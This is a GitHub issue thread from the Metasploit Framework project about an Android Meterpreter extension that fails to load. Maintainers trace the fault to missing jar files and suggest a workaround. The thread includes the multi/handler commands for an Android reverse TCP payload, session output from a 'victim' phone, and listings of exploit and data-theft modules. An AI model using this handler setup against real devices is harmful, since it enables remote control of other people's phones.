When I run an Android Meterpreter reverse TCP multi handler and a connection is received from the victim mobile device, the following error is displayed after the Meterpreter session is established:
Metasploit handler:
use exploit/multi/handler
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST 0.0.0.0
set LPORT 80
exploit
...
[_] Started reverse handler on 0.0.0.0:80
[_] Starting the payload handler...
[_] Sending stage (44648 bytes) to 172.16.1.2
[_] Meterpreter session 1 opened (172.16.1.10:80 -> 172.16.1.2:58301) at 2015-06-18 08:15:11 -0400
meterpreter > [-] Failed to load extension: No module of the name ext_server_android.jar found
This same error was mentioned in issue 5428 (already closed):
https://github.com/rapid7/metasploit-framework/issues/5428
It seems the error is not causing any significant malfunction.
The metasploit version used (in Kali Linux) is the most recent one:
$ sudo dpkg -l | grep -i metasploit
...
ii metasploit 4.11.3-2015061001-1kali0 amd64 Penetration testing and exploit development tool with web-based interface
ii metasploit-common 1.0.2-0kali0 amd64 This package contains common components for Metasploit.
ii metasploit-framework 4.11.3-2015061001-1kali0 amd64 Framework for exploit development and vulnerability research
This should be fixed in the next kali linux package update, coming soon. The last one contained a rather old version of metasploit-framework.
Thanks for the update!
Obviously, the meterpreter functionality is affected by the fact that the "android" module is not loaded, as the file seems to be missing:
meterpreter > load android
Loading extension android...
[-] Failed to load extension: No module of the name ext_server_android.jar found
I have confirmed from another Metasploit instance that the related missing file are:
/usr/share/metasploit-framework/data/meterpreter/ext_server_android.jar
/usr/share/metasploit-framework/data/meterpreter/ext_server_stdapi.jar
Temporarily copying back these files seems to fix it.
root@kali:/usr/share/metasploit-framework# find . -name "_android_"
./lib/rex/post/meterpreter/extensions/android
./lib/rex/post/meterpreter/extensions/android/android.rb
./lib/rex/post/meterpreter/ui/console/command_dispatcher/android.rb
./lib/msf/base/sessions/meterpreter_android.rb
./lib/msf/core/exploit/android.rb
./modules/auxiliary/gather/android_browser_file_theft.rb
./modules/auxiliary/gather/android_object_tag_webview_uxss.rb
./modules/auxiliary/gather/android_stock_browser_uxss.rb
./modules/auxiliary/gather/android_browser_new_tab_cookie_theft.rb
./modules/auxiliary/gather/android_htmlfileprovider.rb
./modules/auxiliary/admin/android
./modules/exploits/android
./modules/payloads/stages/android
./modules/payloads/stagers/android
./data/android
root@kali:/usr/share/metasploit-framework# find . -name "*.jar"
./data/exploits/CVE-2009-3867.jar
./data/exploits/CVE-2008-5353.jar
./data/exploits/CVE-2012-0507.jar
./data/exploits/CVE-2009-3869.jar
./data/exploits/CVE-2008-6508/lib/plugin-metasploit.jar
./data/exploits/msfJavaToolkit.jar
./data/exploits/CVE-2012-1723.jar
./data/android/meterpreter.jar
./data/android/metstage.jar
./data/android/shell.jar
./vendor/bundle/ruby/2.1.0/gems/metasploit-payloads-0.0.5/data/meterpreter/meterpreter.jar
./vendor/bundle/ruby/2.1.0/gems/metasploit-payloads-0.0.5/data/meterpreter/ext_server_stdapi.jar
root@kali:/usr/share/metasploit-framework#
Apologises guys, I'm afk at the moment.
The dump_sms, etc commands are currently missing.
Reverting
https://github.com/timwr/metasploit-framework/commit/3b8effc5893d78386c8d5a9624e18178da57bf30
And creating an empty file named ext_server_android.jar (e.g $ touch
metasploit-framework/data/meterpreter/ext_server_android.jar)
As a workaround should re-enable the android extension.
The real fix is either to refactor the commands from
data/android/meterpreter.jar into ext_server_android.jar or load the
commands even if that file isn't present.
On Tue, 23 Jun 2015 08:12 Tod Beardsley [email protected] wrote:
Ah, not really related at all.
—
Reply to this email directly or view it on GitHub
https://github.com/rapid7/metasploit-framework/issues/5557#issuecomment-114374427
.
Sure - I'll put up the PR for it. I think after that we'll just move these into stdapi since they could apply to other future phone/device based meterpreters.
Please don't comment on issues that were closed almost 2 years ago. If you are looking for support, please visit us on the community website (where we have many guides and tutorials, as well as blog posts, and take support questions) or in the #metasploit IRC channel. Thanks.
ok. apologies, but i need you to point me to the fix, i have been searching for it
The fix was made almost two years ago and is referenced in the PR just before your initial comment above. Kali picked it up a long time ago. If you don't find any info on it in the community site, I encourage you to post your problem there on the community site (with info on exactly what version of Kali and Metasploit you are running, as well as output from the commands you are running) or come visit us in the #metasploit IRC channel. Thx.